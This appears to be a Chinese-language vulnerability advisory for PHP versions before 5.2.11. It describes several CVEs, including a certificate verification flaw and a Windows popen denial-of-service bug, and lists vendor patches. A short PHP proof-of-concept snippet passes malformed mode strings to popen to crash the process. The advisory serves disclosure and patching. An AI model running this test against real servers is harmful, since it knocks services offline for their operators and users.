发布日期：2009-09-17
更新日期：2009-09-23

受影响系统：

PHP PHP 5.2.x

不受影响系统：

PHP PHP 5.2.11

描述：

---

BUGTRAQ  ID: 36449
CVE ID: CVE-2009-3291,CVE-2009-3292,CVE-2009-3293,CVE-2009-3294

PHP是广泛使用的通用目的脚本语言，特别适合于Web开发，可嵌入到HTML中。

PHP的5.2.11之前版本的多个函数中存在安全漏洞，可能允许远程攻击者导致拒绝服务或完全入侵用户系统。

1) PHP的php_openssl_apply_verification_policy函数没有正确的执行证书验证，可能允许攻击者通过伪造的证书执行欺骗攻击。

2) imagecolortransparent函数没有正确的对颜色索引执行过滤检查。

3) 当运行在某些Windows操作系统上时，TSRM/tsrm_win32.c文件中的popen API函数允许攻击者通过第二个参数中的特制e或er字符串导致拒绝服务。

<*来源：Ryan Sleevi
  
  链接：http://secunia.com/advisories/36791
        http://bugs.php.net/bug.php?id=44683
        http://security.gentoo.org/glsa/201001-03.xml
        https://www.redhat.com/support/errata/RHSA-2010-0040.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?php
$t1 = popen("echo hello", "e");
pclose($t1);
$t2 = popen("echo hello", "re");
pclose($t2);
$t3 = popen("echo hello", "er");
pclose($t3);
?>

建议：

---

厂商补丁：

PHP
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.php.net/releases/5_2_11.php

RedHat
------
RedHat已经为此发布了一个安全公告（RHSA-2010:0040-01）以及相应补丁:
RHSA-2010:0040-01：Moderate: php security update
链接：https://www.redhat.com/support/errata/RHSA-2010-0040.html

Gentoo
------
Gentoo已经为此发布了一个安全公告（GLSA 201001-03）以及相应补丁:
GLSA 201001-03：PHP: Multiple vulnerabilities
链接：http://security.gentoo.org/glsa/201001-03.xml

浏览次数：2826
严重程度：0（网友投票）